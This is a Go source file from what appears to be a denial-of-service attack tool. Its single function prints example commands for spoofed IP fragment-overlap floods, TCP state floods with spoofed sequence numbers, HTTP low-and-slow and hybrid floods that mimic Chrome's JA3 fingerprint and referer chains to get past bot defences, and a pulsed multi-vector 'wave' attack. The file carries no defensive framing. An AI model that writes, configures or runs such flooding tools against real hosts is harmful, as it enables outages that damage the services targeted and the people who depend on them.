package cmd

import "fmt"

func PrintExamples() {
	fmt.Println(" Examples (in shell):")
	fmt.Println()
	fmt.Println("  L3 fragment-overlap (update: random payload/TTL/srcIP):")
	fmt.Println("    set target 10.0.0.5")
	fmt.Println("    set l3 rate 50000")
	fmt.Println("    set l3 threads 32")
	fmt.Println("    set l3 flood burst")
	fmt.Println("    set l3 overlap true")
	fmt.Println("    set l3 fuzz-id true")
	fmt.Println("    1")
	fmt.Println()
	fmt.Println("  L4 state-flood (update: TCP options, seq pattern, flag mix):")
	fmt.Println("    set l4 target 10.0.0.5")
	fmt.Println("    set l4 port 443")
	fmt.Println("    set l4 flags ACK,FIN")
	fmt.Println("    set l4 window 65535")
	fmt.Println("    set l4 spoof-seq true")
	fmt.Println("    set l4 threads 32")
	fmt.Println("    2")
	fmt.Println()
	fmt.Println("  L7 low-and-slow / flood / hybrid (flood hight):")
	fmt.Println("    set l7 url https://target.tld")
	fmt.Println("    set l7 mode hybrid")
	fmt.Println("    set l7 threads 100")
	fmt.Println("    set l7 conns 20")
	fmt.Println("    set l7 win-shrink 10")
	fmt.Println("    set l7 interval 5")
	fmt.Println("    set l7 browser chrome")
	fmt.Println("    set l7 js-solver none")
	fmt.Println("    set l7 ja3 true")
	fmt.Println("    set l7 http2 true")
	fmt.Println("    set l7 referer-chain true")
	fmt.Println("    3")
	fmt.Println()
	fmt.Println("  Wave (pulse x vector, burst x5 rate):")
	fmt.Println("    set wave on 60s")
	fmt.Println("    set wave off 5s")
	fmt.Println("    set wave jitter 3s")
	fmt.Println("    set wave vectors l3,l4,l7")
	fmt.Println("    4")
	fmt.Println()
	fmt.Println(`  enter "help" to get assistance, show = config`)
}